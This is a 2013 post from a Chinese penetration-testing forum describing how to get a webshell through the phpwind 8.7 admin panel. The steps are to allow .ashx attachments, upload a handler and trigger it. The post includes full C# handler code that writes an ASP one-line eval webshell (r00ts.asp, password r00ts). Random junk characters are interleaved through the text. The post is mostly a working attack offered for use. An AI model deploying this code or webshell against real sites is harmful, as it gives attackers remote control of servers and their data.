找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2099|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小2 Z3 _, `+ n( f6 F( K

: ]) G+ o8 z6 m2 @7 r* d群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
" t0 s/ ]( ^) k: `/ n( K
7 j* k% d; C6 B7 z发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整1 l, U4 ^1 d" t5 b) {9 Y- X
0 i5 i8 A; Y- E) G
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx4 b/ r+ Q" ?# r) ?2 B* x

) e' ~# K0 N. Y% J" i3 u打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
; \) I7 r# m" z7 ?* g
2 g  R# ~# A# w" A* h5 L0 t下面是代码:3 y+ z" U4 F! l/ q% Y, |  C
. Q' q5 K+ n% Q7 `1 r
<%@ WebHandler Language="C#"Class="Handler" %>
5 y1 M# Q, ?% @7 Susing System;  e- F2 z- L8 s' Q
using System.Web;
) n, i0 Q9 V% I. D" ]% s! Xusing System.IO;% O5 Q9 Q- I3 [2 C2 p
public class Handler : IHttpHandler {# m4 r8 u" a/ r4 R0 x# ^2 K
public void ProcessRequest (HttpContext context) {1 i4 w0 G8 h& k( P* o
context.Response.ContentType = "text/plain";5 Y! D5 Q* V5 A* k
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
, s6 l/ R9 b1 i4 bfile1.Write("<%eval request(\"r00ts\")%>");' C# a3 i. @2 f- s) a$ B9 r
file1.Flush();
; T" r: y7 c+ L  K! ]8 [& z' L* dfile1.Close();$ R0 v; W! p5 M9 Q
}4 z- y& g* g, C$ e7 m9 j
public bool IsReusable {
8 `. Z, w1 ?: H* q  _get {
+ o( p. T! `4 U- L) {return false;
; o/ T4 S9 e2 f# S: H}
# n" B, [" d  X+ h7 [5 c8 y2 X. \' ]}: q8 X' v! w3 E( {  @
}
5 e3 U; [1 e; y9 v' Z
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表